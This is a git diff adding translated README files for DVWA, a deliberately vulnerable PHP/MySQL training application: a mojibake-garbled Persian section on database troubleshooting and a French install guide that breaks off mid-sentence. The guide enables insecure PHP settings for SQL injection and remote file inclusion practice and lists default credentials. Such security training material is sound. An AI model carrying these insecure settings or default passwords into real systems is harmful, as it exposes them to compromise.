اØŦØąØ§ÛŒ Ų…ØąØ§Ø­Ų„ Ø˛ÛŒØą اØŗØĒ: +1. با ÚŠØ§ØąØ¨Øą ØąŲˆØĒ، ŲØ§ÛŒŲ„ `/etc/mysql/mysql.conf.d/mysqld.cnf` ØąØ§ Ø¨ØąØ§ÛŒ ŲˆÛŒØąØ§ÛŒØ´ Ø¨Ø§Ø˛ ÚŠŲ†ÛŒØ¯. +2. Ø˛ÛŒØą ØŗØˇØą `[mysqld]`، ØšØ¨Ø§ØąØĒ Ø˛ÛŒØą ØąØ§ بیŲØ˛Ø§ÛŒÛŒØ¯: `default-authentication-plugin=mysql_native_password` +3. ØŗØąŲˆÛŒØŗ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ØąØ§ ØąÛŒØŗØĒØ§ØąØĒ ÚŠŲ†ÛŒØ¯: `sudo service mysql restart` +4. حاŲ„ØĒ Ø§ØąØ˛ÛŒØ§Ø¨ÛŒ ŲˆØąŲˆØ¯ ØąØ§ Ø¨ØąØ§ÛŒ ÚŠØ§ØąØ¨ØąØĒاŲ† Ø¨ØąØąØŗی ÚŠŲ†ÛŒØ¯: + + + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` +1. احØĒŲ…اŲ„اŲ‹ `caching_sha2_password` بŲ‡ چشŲ…ØĒاŲ† ØŽŲˆØ§Ų‡Ø¯ ØŽŲˆØąØ¯ Ø¯Øą ایŲ† ØĩŲˆØąØĒ دØŗØĒŲˆØą Ø˛ÛŒØą ØąØ§ اØŦØąØ§ ÚŠŲ†ÛŒØ¯: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +1. Ø§Ú¯Øą دŲˆØ¨Ø§ØąŲ‡ Ø¨ØąØąØŗی ÚŠŲ†ÛŒØ¯ØŒ ایŲ†Ø¯ŲØšŲ‡ Ų…ی‌بایØŗØĒ `mysql_native_password` ØąØ§ ببیŲ†ÛŒØ¯. + + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` +ŲžØŗ Ø§Ø˛ ØĒŲ…اŲ… ایŲ† ÚŠØ§ØąŲ‡Ø§ØŒ اŲ„اŲ† ŲØąØ§ÛŒŲ†Ø¯ Ų†Øĩب باید بØĒŲˆØ§Ų†Ø¯ بŲ‡ ØĩŲˆØąØĒ ؚادی اŲ†ØŦاŲ… Ø´ŲˆØ¯. +Ø¨ØąØ§ÛŒ Ø§ØˇŲ„اؚاØĒ بیشØĒØą ØĩŲØ­Ų‡Ų” Ø˛ÛŒØą ØąØ§ دŲ†Ø¨Ø§Ų„ ÚŠŲ†ÛŒØ¯: + . + +### ØŽØˇØ§ÛŒ Ø´Ų…Ø§ØąŲ‡ Û˛Û°Û°Û˛ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡: چŲ†ÛŒŲ† ŲØ§ÛŒŲ„ یا ŲžŲˆØ´Ų‡â€ŒØ§ÛŒ ŲˆØŦŲˆØ¯ Ų†Ø¯Ø§ØąØ¯ +ØŗØąŲˆØą ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ Ø¯Øą حاŲ„ اØŦØąØ§ Ų†ÛŒØŗØĒŲˆ Ø¯Øą ØĒŲˆØ˛ÛŒØšâ€ŒŲ‡Ø§ÛŒ Ų…بØĒŲ†ÛŒ Ø¨Øą دبیاŲ† Ų…ی‌ØĒŲˆØ§Ų†ÛŒØ¯ ایŲ†Ú¯ŲˆŲ†Ų‡ Ų…Ø´ÚŠŲ„ ØąØ§ Ø¨ØąØˇØąŲ ÚŠŲ†ÛŒØ¯: + +```sh +sudo service mysql start +``` + +### ØŽØˇØ§Ų‡Ø§ÛŒ "MySQL server has gone away" Ųˆ "Packets out of order" +چŲ†Ø¯ÛŒŲ† دŲ„ÛŒŲ„ Ų…Ų…ÚŠŲ† اØŗØĒ Ø¨ØąØ§ÛŒ Ú¯ØąŲØĒŲ† ØŽØˇØ§Ų‡Ø§ÛŒ باŲ„ا ŲˆØŦŲˆØ¯ داشØĒŲ‡ باشد. اŲ…ا شایؚ‌ØĒØąÛŒŲ†Ø´Ø§Ų† ایŲ† اØŗØĒ ÚŠŲ‡ Ų†ØŗØŽŲ‡Ų” ØŗØąŲˆØą ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡Ų” Ø´Ų…ا با Ų†ØŗØŽŲ‡Ų” ŲžÛŒâ€ŒØ§Ú†â€ŒŲžÛŒ ØŗØ§Ø˛Ú¯Ø§ØąÛŒ Ų†Ø¯Ø§ØąØ¯. + +ایŲ† Ų…Ų…ÚŠŲ† اØŗØĒ ŲˆŲ‚ØĒی اØŗØĒŲØ§Ø¯Ų‡ Ø§Ø˛ ØĸØŽØąÛŒŲ† Ų†ØŗØŽŲ‡â€ŒŲ‡Ø§ÛŒ Ų…ای‌اØŗÚŠÛŒŲˆØ§Ų„ Ųˆ ŲžÛŒâ€ŒØ§Ú†â€ŒŲžÛŒ بŲ‡ ØŽŲˆØ¨ÛŒ ŲžÛŒØ´â€ŒŲ†ØąŲˆØ¯ Ų…شاŲ‡Ø¯Ų‡ Ø´ŲˆØ¯. بŲ‡ØĒØąÛŒŲ† ØĒŲˆØĩیŲ‡ ÚŠŲ†Ø§ØąÚ¯Ø°Ø§Ø´ØĒŲ† Ų…ای‌اØŗÚŠÛŒŲˆØ§Ų„ Ųˆ Ų†Øĩب Ų…Ø§ØąÛŒØ§â€ŒØ¯ÛŒâ€ŒØ¨ÛŒ اØŗØĒ Ú†ØąØ§ ÚŠŲ‡ ایŲ† Ų…ŲˆØļŲˆØšÛŒ Ų†ÛŒØŗØĒ ÚŠŲ‡ بØĒŲˆØ§Ų†ÛŒŲ… ŲžØ´ØĒیباŲ†ÛŒ بیشØĒØąÛŒ Ø¯Øą Ų…ŲˆØąØ¯ ØĸŲ† بدŲ‡ÛŒŲ…. + + +Ø¨ØąØ§ÛŒ Ø§ØˇŲ„اؚاØĒ بیشØĒØą ایŲ†ØŦا ØąØ§ ببیŲ†ÛŒØ¯: + + + +### ØĒØ˛ØąÛŒŲ‚ دØŗØĒŲˆØą ÚŠØ§Øą Ų†Ų…ی‌ڊŲ†Ø¯ +ØĸŲžØ§Ú†ÛŒ Ų…Ų…ÚŠŲ† اØŗØĒ ØŗØˇØ­ دØŗØĒØąØŗی ڊاŲÛŒ Ø¨ØąØ§ÛŒ اØŦØąØ§ÛŒ دØŗØĒŲˆØąØ§ØĒ ØąŲˆÛŒ ØŗØąŲˆØą ŲˆØ¨ÛŒ ØąØ§ Ų†Ø¯Ø§Ø´ØĒŲ‡ باشد. Ø§Ú¯Øą DVWA ØąØ§ ØĒØ­ØĒ Ų„ÛŒŲ†ŲˆÚŠØŗ اØŦØąØ§ Ų…ی‌ڊŲ†ÛŒØ¯ØŒ Ø§ØˇŲ…ÛŒŲ†Ø§Ų† حاØĩŲ„ ÚŠŲ†ÛŒØ¯ ÚŠŲ‡ با ÚŠØ§ØąØ¨Øą ØąŲˆØĒ ŲˆØ§ØąØ¯ شدŲ‡â€ŒØ§ÛŒØ¯. Ø¯Øą ŲˆÛŒŲ†Ø¯ŲˆØ˛ Ø§Ø˛ ŲˆØąŲˆØ¯ بŲ‡ ØĩŲˆØąØĒ Administrator Ø§ØˇŲ…ÛŒŲ†Ø§Ų† حاØĩŲ„ ÚŠŲ†ÛŒØ¯. + + +### Ú†ØąØ§ Ø¯Øą ØŗŲ†ØĒ‌اŲˆØ§Øŗ Ų†Ų…ی‌ØĒŲˆØ§Ų† بŲ‡ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ŲˆØĩŲ„ شد +Ų…Ø´ÚŠŲ„ Ø´Ų…ا Ų…Ų…ÚŠŲ† اØŗØĒ بŲ‡ selinux‌ Ų…ØąØ¨ŲˆØˇ باشد. یا ØĸŲ† ØąØ§ ØēÛŒØą ŲØšØ§Ų„ ÚŠŲ†ÛŒØ¯ØŒ یا با دØŗØĒŲˆØą Ø˛ÛŒØą Ų…ØŦŲˆØ˛ اØĒØĩاŲ„ بŲ‡ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ØąØ§ ŲØąØ§Ų‡Ų… ÚŠŲ†ÛŒØ¯: + +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### ØŗØ§ÛŒØą Ų…ØŗاØĻŲ„ +Ø¨ØąØ§ÛŒ دیدŲ† ØĸØŽØąÛŒŲ† Ų…ØˇØ§Ų„ب اشڊاŲ„â€ŒØ˛Ø¯Ø§ÛŒÛŒ ØĒیڊØĒ‌Ų‡Ø§ÛŒ Ø¨Ø§Ø˛ Ųˆ بØŗØĒŲ‡ ØąØ§ Ø¯Øą Ų…ØŽØ˛Ų† گیØĒ Ų…ØˇØ§Ų„ØšŲ‡ ÚŠŲ†ÛŒØ¯: + + + +Ų„ØˇŲØ§Ų‹ Ų‚بŲ„ Ø§Ø˛ Ø§ØąØŗاŲ„ ØĒیڊØĒ ØŦدید Ø§ØˇŲ…ÛŒŲ†Ø§Ų† حاØĩŲ„ ÚŠŲ†ÛŒØ¯ ÚŠŲ‡ Ø§Ø˛ ØĸØŽØąÛŒŲ† Ų†ØŗØŽŲ‡Ų” ڊد Ų…ŲˆØŦŲˆØ¯ Ø¯Øą Ų…ØŽØ˛Ų† اØŗØĒŲØ§Ø¯Ų‡ Ų…ی‌ڊŲ†ÛŒØ¯. ایŲ† با ØĸØŽØąÛŒŲ† اŲ†ØĒØ´Ø§Øą ŲØąŲ‚ Ø¯Ø§ØąØ¯ØŒ Ų…Ų†Ø¸ŲˆØą ØĸØŽØąÛŒŲ† ڊد Ø§Ø˛ شا؎Ų‡Ų” Ų…ØŗØĒØą اØŗØĒ. +Ø§Ú¯Øą Ų‚Øļد Ø§ØąØŗاŲ„ ØĒیڊØĒی Ø¯Ø§ØąÛŒØ¯ØŒ حداŲ‚Ų„ Ø§ØˇŲ„اؚاØĒ Ø˛ÛŒØą ØąØ§ ŲØąØ§Ų‡Ų… ÚŠŲ†ÛŒØ¯: + +- ØŗیØŗØĒŲ… ؚاŲ…Ų„ +- ØĸØŽØąÛŒŲ† ŲžŲ†ØŦ ØŽØˇ Ø§Ø˛ Ų„اگ ØŗØąŲˆØą Ø¯Øą ØŦایی ÚŠŲ‡ Ų…ØąØ¨ŲˆØˇ بŲ‡ Ú¯Ø˛Ø§ØąØ´ ØŽØˇØ§ÛŒ Ø´Ų…ا اØŗØĒ. +- Ø§Ú¯Øą Ú¯Ø˛Ø§ØąØ´ØĒاŲ† Ų…ØąØ¨ŲˆØˇ بŲ‡ ŲˆØąŲˆØ¯ بŲ‡ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ اØŗØĒ، Ų…ØąØ§Ø­Ų„ Ų…ØąØĒØ¨Øˇ Ø°ÚŠØą شدŲ‡ Ø¨ØąØ§ÛŒ ØąŲØš اشڊاŲ„اØĒ ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ÚŠŲ‡ Ø¯Øą باŲ„ا ØĸŲ…دŲ‡ اØŗØĒ ØąØ§ ØˇÛŒ ÚŠŲ†ÛŒØ¯ Ųˆ Ø§Ø˛ Ų‡Øą Ų…ØąØ­Ų„Ų‡ اØŗÚŠØąÛŒŲ†â€ŒØ´Ø§ØĒ Ø¨Ú¯ÛŒØąÛŒØ¯. ØĸŲ†Ų‡Ø§ ØąØ§ بŲ‡ Ų‡Ų…ØąØ§Ų‡ اØŗÚŠØąÛŒŲ†â€ŒØ´Ø§ØĒ Ø§Ø˛ ب؎شی Ø§Ø˛ ŲØ§ÛŒŲ„ ڊاŲ†ŲÛŒÚ¯ ÚŠŲ‡ Ų†Ø§Ų… ÚŠØ§ØąÛŒØąÛŒØŒ ÚŠŲ„Ų…Ų‡Ų” ؚبŲˆØą Ųˆ Ų†Ø§Ų… ŲžØ§ÛŒÚ¯Ø§Ų‡ دادŲ‡ ØąØ§ Ø¨ØąØ§ÛŒ اØĒØĩاŲ„ بŲ‡ ØŗØąŲˆØą Ų…Ø´ØŽØĩ Ų…ی‌ڊŲ†Ø¯ ØļŲ…ÛŒŲ…Ų‡ ÚŠŲ†ÛŒØ¯. +- ØĒŲˆØļیح ڊاŲ…Ų„ÛŒ Ø§Ø˛ ایŲ†ÚŠŲ‡ چŲ‡ Ų…Ø´ÚŠŲ„ÛŒ ŲˆØŦŲˆØ¯ Ø¯Ø§ØąØ¯ØŒ چŲ‡ اŲ†ØĒØ¸Ø§ØąÛŒ داشØĒید، Ųˆ چŲ‡ ØĒŲ„اش‌Ų‡Ø§ÛŒÛŒ ØĒا ÚŠŲ†ŲˆŲ† Ø¨ØąØ§ÛŒ ØąŲØš ØĸŲ† اŲ†ØŦاŲ… دادŲ‡â€ŒØ§ÛŒØ¯. بیاŲ† ایŲ†ÚŠŲ‡ "ŲˆØąŲˆØ¯ ÚŠØ§Øą Ų†Ų…ی‌ڊŲ†Ø¯" Ø¨ØąØ§ÛŒ Ø¯ØąÚŠ Ų…Ø´ÚŠŲ„ Ųˆ ÚŠŲ…ÚŠ بŲ‡ Ø´Ų…ا Ø¨ØąØ§ÛŒ Ø¨ØąØˇØąŲ ÚŠØąØ¯Ų† ØĸŲ† ڊاŲÛŒ Ų†ÛŒØŗØĒ. + + +- - - + +## ØĒØ˛ØąÛŒŲ‚ اØŗ‌ڊیŲˆØ§Ų„ Ø¯Øą SQLite3 + +_ŲžØ´ØĒیباŲ†ÛŒ Ø§Ø˛ ایŲ† Ų…ŲˆØļŲˆØš بØŗÛŒØ§Øą Ų…حدŲˆØ¯ اØŗØĒ. Ų‚بŲ„ Ø§Ø˛ ØĢبØĒ ØŽØˇØ§ باید Ø§ØˇŲ…ÛŒŲ†Ø§Ų† داشØĒŲ‡â€ŒØ¨Ø§Ø´ÛŒØ¯ Ø¨ØąØ§ÛŒ ÚŠØ§ØąÚŠØąØ¯Ų† Ø¨Øą ØąŲˆÛŒ اشڊاŲ„Ø˛Ø¯Ø§ÛŒÛŒ ØĸŲ…ادگی ڊاŲÛŒ ØąØ§ داشØĒŲ‡ باشید. Ø§Ø˛ Ų…ØˇØąØ­â€ŒÚŠØąØ¯Ų† "ŲŲ„اŲ† Ú†ÛŒØ˛ ÚŠØ§Øą Ų†Ų…ی‌ڊŲ†Ø¯" بŲžØąŲ‡ÛŒØ˛ÛŒØ¯_ +بŲ‡ ØˇŲˆØą ŲžÛŒØ´â€ŒŲØąØļ SQLi Ųˆ Blind SQLi Ø¨Øą ØąŲˆÛŒ ØŗØąŲˆØą Ų…Ø§ØąÛŒØ§â€ŒØ¯ÛŒâ€ŒØ¨ÛŒ یا Ų…ای‌اØŗÚŠÛŒŲˆØ§Ų„ اØŗØĒŲØ§Ø¯Ų‡ شدŲ‡ Ø¯Øą ØŗایØĒ اŲ†ØŦاŲ… Ų…ی‌شŲˆŲ†Ø¯. اŲ…ا ایŲ† اŲ…ڊاŲ† ŲˆØŦŲˆØ¯ Ø¯Ø§ØąØ¯ ÚŠŲ‡ ØĒØŗØĒ SQLi ØąØ§ بØŦای ØĸŲ† Ø¨Øą ØąŲˆÛŒ یڊ SQLite3‌ اŲ†ØŦاŲ… دŲ‡ÛŒØ¯. +Ø¯Øą ایŲ†ØŦا چگŲˆŲ†Ú¯ÛŒ ØąØ§Ų‡â€ŒØ§Ų†Ø¯Ø§Ø˛ÛŒ Ųˆ ÚŠØ§ØąÚŠØąØ¯Ų† SQLite3 با PHP‌ ØĒŲˆØļیح دادŲ‡ Ų†Ų…ی‌شŲˆØ¯ØŒ اŲ…ا Ú†ÛŒØ˛ ØŗادŲ‡â€ŒØ§ÛŒ Ø¯Øą حد Ų†Øĩب `php-sqlite3` Ųˆ Ø§ØˇŲ…ÛŒŲ†Ø§Ų† Ø§Ø˛ ŲØšØ§Ų„ بŲˆØ¯Ų† ØĸŲ† ØąØ§ یادØĸŲˆØąÛŒ Ų…ی‌ڊŲ†ÛŒŲ…. + +Ø¨ØąØ§ÛŒ ØĒØēÛŒÛŒØąØŒ ڊاŲÛŒØŗØĒ ŲØ§ÛŒŲ„ ڊاŲ†ŲÛŒÚ¯ ØąØ§ ŲˆÛŒØąØ§ÛŒØ´ ÚŠŲ†ÛŒØ¯ Ųˆ ØŽØˇŲˆØˇ Ø˛ÛŒØą ØąØ§ ØĒØēÛŒÛŒØą دادŲ‡ یا اØļاŲŲ‡ ÚŠŲ†ÛŒØ¯: + + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +بŲ‡ ØˇŲˆØą ŲžÛŒØ´â€ŒŲØąØļ Ø§Ø˛ ŲØ§ÛŒŲ„ `database/sqli.db` اØŗØĒŲØ§Ø¯Ų‡ Ų…ی‌شŲˆØ¯. Ø§Ú¯Øą بŲ‡ ØˇŲˆØą اØĒŲØ§Ų‚ÛŒ بŲ‡ ایŲ† ŲØ§ÛŒŲ„ ØĸØŗب Ø˛Ø¯ÛŒØ¯ØŒ ØĸŲ† ØąØ§ Ø§Ø˛ Ų…بدا `database/sqli.db.dist` Ø¨Ø§Ø˛Ų†ŲˆÛŒØŗی ÚŠŲ†ÛŒØ¯ +باŲ‚ÛŒ Ų…ØŗاØĻŲ„ Ų‡Ų…اŲ†Ų†Ø¯ Ų…ای‌اØŗ‌ڊیŲˆâ€ŒØ§Ų„ اØŗØĒ با ایŲ† ØĒŲØ§ŲˆØĒ ÚŠŲ‡ Ø§Ø˛ SQLite3 بØŦای ØĸŲ† اØŗØĒŲØ§Ø¯Ų‡ ÚŠØąØ¯Ų‡â€ŒØ§ÛŒŲ…. + + + +- - - + +## ŲžÛŒŲˆŲ†Ø¯Ų‡Ø§ + +ØĩŲØ­Ų‡Ų” اØĩŲ„ÛŒ ŲžØąŲˆÚ˜Ų‡: + +*ØĒŲ‡ÛŒŲ‡â€ŒØ´Ø¯Ų‡ ØĒŲˆØŗØˇ ØĒیŲ… DVWA* diff --git a/DVWA/README.fr.md b/DVWA/README.fr.md new file mode 100644 index 00000000..f0296e9e --- /dev/null +++ b/DVWA/README.fr.md @@ -0,0 +1,386 @@ +# Translation / Traduction + +Philibert Gentilīŧš@[Philibert-Gentil](https://github.com/Philibert-Gentil) +Vous pouvez me contacter en cas d'erreur de traduction / d'interprÊtation. + +- - - + +# DAMN VULNERABLE WEB APPLICATION / BORDEL D'APPLICATION WEB VULNÉRABLE + +Bordel d'application web vulnÊrable (BAWV, traduit DVWA) est une application web PHP/MySQL vulnÊrable. Son but principal est d'ÃĒtre une aide pour les experts en sÊcuritÊ pour tester leurs compÊtences et outils dans un environnement lÊgal, aider les dÊveloppeurs web à mieux comprendre la sÊcurisation des applications web et d'aider les Êlèves et professeurs à apprendre la sÊcuritÊ des applications web dans un environnement d'Êtudes. + +L'objectif de BAWV est **d'expÊrimenter les vulnÊrabilitÊs web les plus communes**, avec **diffÊrents niveaux de difficultÊ**, avec une interface intuitive. +Notez qu'il existe des **vulnÊrabilitÊs documentÊes ou non** avec ce programme. C'est intentionnel. Vous ÃĒtes encourragÊs à essayer et dÊcouvrir autant de failles que possible. +- - - + +## ATTENTION ! + +Bordel D'application web vulnÊrable est vachement vulnÊrable ! **Ne la publiez pas sur le dossier html public de votre hÊbergeur ni aucun serveur visible sur internet**, ou ils seront compromis. Il est recommendÊ d'utiliser une machine virtuelle (comme [VirtualBox](https://www.virtualbox.org/) ou [VMware](https://www.vmware.com/)), rÊglÊ sur le mode rÊseau NAT. Dans une machine invitÊe, vous pouvez tÊlÊcharger et installer [XAMPP](https://www.apachefriends.org/) pour le serveur web et la base de donnÊes. + +### Non-responsabilitÊ + +Nous ne sommes pas responsables de la manière dont vous utilisez BAWV. Nous avons clairement dÊfini les objectifs de l'application et elle ne dois pas ÃĒtre utilisÊe de manière malveillante. Nous vous avons averti et avons pris les mesures nÊcessaires pour informer les utilisateurs de BAWV à propos de son installation sur un serveur. Si votre serveur est compromis à cause d'une installation de BAWV, il n'en dÊcoule pas de notre responsabilitÊ, mais de celle de la/les personne(s) qui l'a/ont tÊlÊchargÊ ou installÊ, envoyÊ. +- - - + +## License + +Ce fichier fait parie du bordel d'application web vulnÊrable (BAWV) + +Bordel d'application web vulnÊrable (BAWV) est un logiciel libre: vous pouvez le re-distribuer et/ou le modifier en respectant les termes de la licence publique gÊnÊrale GNU (GNU General Public License) tel que publiÊ par +La fondation des logiciels libres (the Free Software Foundation), +soit la troisième version de la licence, soit une version ultÊrieure. + +Bordel d'application web vulnÊrable (BAWV) est distribuÊ dans l'espoir qu'il vous sera utile, +mais SANS GARANTIE; sans mÃĒme la garantie implicite de qualitÊ professionnelle ou particulière. +Voyez la license publique gÊnÊrale GNU pour plus de dÊtails. + +Vous devriez avoir reçu une copie de la license publique gÊnÊrale GNU +en mÃĒme temps que le bordel d'application web vulnÊrable (BAVW). Sinon, consultez . +- - - + +## Internationalisation + +Ce fichier est disponibles dans diverses langues ci-dessous : +- Chinois: [įŽ€äŊ“中文](README.zh.md) +- Turque: [TÃŧrkçe](README.tr.md) +- Anglais: [English](README.md) + +Si vous souhaitez contribuer à la traduction, faite une demande d'extraction (pull request, PR). Par contre, ça ne doit pas ÃĒtre juste du Google Trad, ou ce sera rejetÊ. + +- - - + +## TÊlÊchargement + +MÃĒme s'il y a diverses versions de BAVW, la seule version soutenue via cette source du dÊpôt GitHub est celle-ci. Vous pouvez la cloner depuis le dÊpôt suivant : + +``` +git clone https://github.com/digininja/DVWA.git +``` + +Ou [tÊlÊcharger le fichier zippÊ](https://github.com/digininja/DVWA/archive/master.zip). +- - - + +## Installation + +**Soyez sÃģrs que le fichier config/config.inc.php existe. Avoir le fichier config.inc.php.dist ne suffira pas, vous devrez le modifier par rapport à votre environnement et le renommer config.inc.php. [Windows cachera peut-ÃĒtre l'extension](https://lecrabeinfo.net/afficher-extensions-noms-de-fichiers-dans-windows.html)** + +## VidÊos d'installation +- (en anglais) [Installing DVWA on Kali running in VirtualBox](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- (En anglais) [Installing Damn Vulnerable Web Application (DVWA) on Windows 10](https://www.youtube.com/watch?v=cak2lQvBRAo) \[12:39 minutes\] + +### Win + XAMPP + +La solution la plus facile pour installer BAVW est de tÊlÊcharger et d'installer [XAMPP](https://www.apachefriends.org/) si vous n'avez pas dÊjà de serveur web. + +XAMPP est une distribution apache pour Linux, Solaris, Windows et MacOS très facile d'installation. Le paquet inclut le serveur web apache, MySQL, PHP, Perl, un serveur FTP et phpMyAdmin. + +XAMPP peut ÃĒtre tÊlÊchargÊ depuis : + + +DÊzippez simplement dvwa.zip, placez le fichier dÊcompressÊ dans votre fichier HTML public, puis allez avec votre navigateur sur `http://localhost/dvwa/setup.php` + +### Paquets Linux + +Si vous utilisez une distribution basÊe sur Debian (Debian, ubuntu, kali, parrot, Rapberry pi OS etc), vous devez installer les paquets suivants _(ou leurs Êquivalents)_: + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php +- php-mysql +- php-gd +- php-mbstring + +La commande suivante vous permet de les installer. + +`apt install apache2 mariadb-server php php-mysqli php-gd php-mbstring libapache2-mod-php` + +Note: php-mbstring permet de gÊrer les caractères europÊens, arabes, caligraphiques et caetera, notamment la table de caractères UTF-8. Ne pas la tÊlÊcharger pourrait entrainez des problèmes d'affichage si vous n'avez pas un langage germanique comme l'anglais ou l'allemand. + +Le site fonctionnera avec MySQL à la place de MariaDB mais nous recommendons fortement MariaDB car cela fonctionne directement, contrairement à MySQL que vous devrez modifier. + +### ParamÊtrage de la base de donnÊes + +Pour crÊer une base de donnÊes (BDD), cliquez simplement sur le bouton `Setup DVWA` (configurer BAWV) dans le menu principal puis cliquez sur le bouton `Create / Reset Database` (crÊez / rÊinitialisez la BDD). Cela crÊera / rÊinitialisera la BDD pour vous avec des donnÊes dedans. + +Si vous rencontrez une erreur en essayant de crÊer la BDD, soyez sÃģrs que les identifiants de la BDD soient corrects dans `./config/config.inc.php`. *Elles diffèrent de config.inc.php.dist, qui est un fichier bateau*. + +Les variables sont dÊfinies comme ceci par dÊfaut: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; //l'IP du serveur +$_DVWA[ 'db_port'] = '3306'; //Le port pour accÊder à la BDD +$_DVWA[ 'db_user' ] = 'dvwa'; //L'utilisateur de la BDD +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; //Le mdp +$_DVWA[ 'db_database' ] = 'dvwa'; //Le nom de la BDD +``` + +PS: si vous utilisez MariaDB plutôt que MySQL (MariaDB est là par dÊfaut sur Kali), vous ne pouvez utilisez la BDD en tant que root, vous devez crÊer un nouvel utilisateur. Pour faire cela, connectez vous à la BDD en tant que super-administrateur (root) dans un terminal et tapez les commandes suivantes: + +```mysql +mysql> create database dvwa; //On crÊe la BDD +Query OK, 1 row affected (0.00 sec) + +mysql> create user dvwa@localhost identified by 'p@ssw0rd'; //On crÊe l'utilisateur +Query OK, 0 rows affected (0.01 sec) + +mysql> grant all on dvwa.* to dvwa@localhost;//On lui donne toute les permissions dans la BDD dvwa +Query OK, 0 rows affected (0.01 sec) + +mysql> flush privileges;//On actualise les privilèges (en gros) +Query OK, 0 rows affected (0.00 sec) +``` + +### Autres configurations + +En fonction de votre système d'exploitaiton (SE), tout comme la version de PHP, vous devrez peut-ÃĒtre modifier la configuration initiale. La localisation des fichiers sera Êventuellement diffÊrente, selon votre machine. + +**Permissions du fichier** + +* `./hackable/uploads/` - Doit ÃĒtre disponible en Êcriture par le serveur web (des fichiers y seront uploadÊs). +* `./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt` - Doit ÃĒtre disponible en Êcriture par le serveur web (si vous voulez utiliser les PHPIDS). + +**Configuration PHP** + +* `allow_url_include = on` - Autorise l'utilisation du gestionnaire des URL par certaines fonctions (RFI) [[allow_url_include](https://secure.php.net/manual/fr/filesystem.configuration.php#ini.allow-url-include)] +* `allow_url_fopen = on` - Autorisation pour l'accès au fichiers (RFI) [[allow_url_fopen](https://secure.php.net/manual/fr/filesystem.configuration.php#ini.allow-url-fopen)] +* `safe_mode = off` - (Si PHP <= v5.4) Autorise l'injection SQL (SQLi) [[safe_mode](https://secure.php.net/manual/fr/features.safe-mode.php)] +* `magic_quotes_gpc = off` - (Si PHP <= v5.4) Autorise l'injection SQL (SQLi) [[magic_quotes_gpc](https://secure.php.net/manual/fr/security.magicquotes.php)] +* `display_errors = off` - (Optional) Cache les messages d'avertissement PHP [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + +**Fichier: `config/config.inc.php`**: + +* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - Ces valeurs doivent ÃĒtre gÊnÊrÊes depuis: https://www.google.com/recaptcha/admin/create + +### Identifiants par dÊfaut + +**Identifiant par dÊfaut = `admin`** + +**Clef par dÊfaut = `password`** + +_... peut ÃĒtre facilement craquÊ ;)_ +URL de connection: http://127.0.0.1/login.php +_PS: Ce sera diffÊrent si vous installez BAWV dans un autre fichier._ +- - - + +## Container Docker +_Cette section du fichier à ÊtÊ ajoutÊ par @thegrims, pour de l'aide à propos d'erreurs docker, veuillez le contacter ou contactez @opsxcq, qui est le maÃŽtre du dÊpôt et de l'image docker. Un signalement d'erreur lui sera sÃģrement adressÊ et celle-ci sera collematÊe_ + +- [page dockerhub](https://hub.docker.com/r/vulnerables/web-dvwa/) +`docker run --rm -it -p 80:80 vulnerables/web-dvwa` + +Soyez sÃģrs d'utiliser AUFS à cause d'erreurs antÊrieurs de MySQL. Lancez `docker info` pour vÊrifier le stockage de votre lecteur. Si il n'est pas en AUFS, veuillez le changer. Il y a un manuel pour chaque SE (OS), mais il sont tellement diffÊrents que nous n'aborderons pas ce sujet. + +### Construction locale + +Si vous avez fais des changements et voulez construire le projet à partir de votre version locale, editez le fichier `compose.yml` et changez `pull_policy: always` par `pull_policy: build`. + +ExÊcuter la commande `docker compose up -d` va dÊclancher Docker à construire une image à partir de votre version locale, sans regard sur ce qui est disponible dans le registre. + +Pour plus d'informations (En anglais): [`pull_policy`](https://github.com/compose-spec/compose-spec/blob/master/05-services.md#pull_policy). + +### Servir les fichiers locaux + +Si vous faites des changements et ne voulez pas avoir à reconstruire l'image après chaque changement : + +1. Éditer le fichier `compose.yml` et dÊcommenter : + ``` + # volumes: + # - ./:/var/www/html + ``` +2. ExÊcuter `cp config/config.inc.php.dist config/config.inc.php` pour copier le fichier de configuration par dÊfaut. +3. ExÊcuter `docker compose up -d` et les changements au fichiers locaux seront rÊflÊchies sur le conteneur. + +- - - + +## DÊpannage + +Nous considÊrons que vous ÃĒtes sur une distribution basÊe sur Debian, comme Debian, Ubuntu, Kali ou Raspberry pi OS. Pour les autres distributions, suivez les instructions en adaptant les commandes à votre distribution. + +### Le site me donne une erreur 404 + +Si vous avez ce problème, vous devez comprendre la localistaion des fichiers. Par dÊfaut, le fichier racine apache (l'endroit oÚ il cherche le contenu du site) est `/var/www/html`. Si vous mettez un fichier nommÊ `salut.txt` dans ce dossier, vous devrez, pour y accÊder, noter `http://localhost/salut.txt`. + +Si vous crÊer un dossier et que vous y mettez un fichier - `/var/www/html/mondossier/salut.txt` - vous devrez Êcrire `http://localhost/mondossier/salut.txt`. + +Linux est sensible à la casse 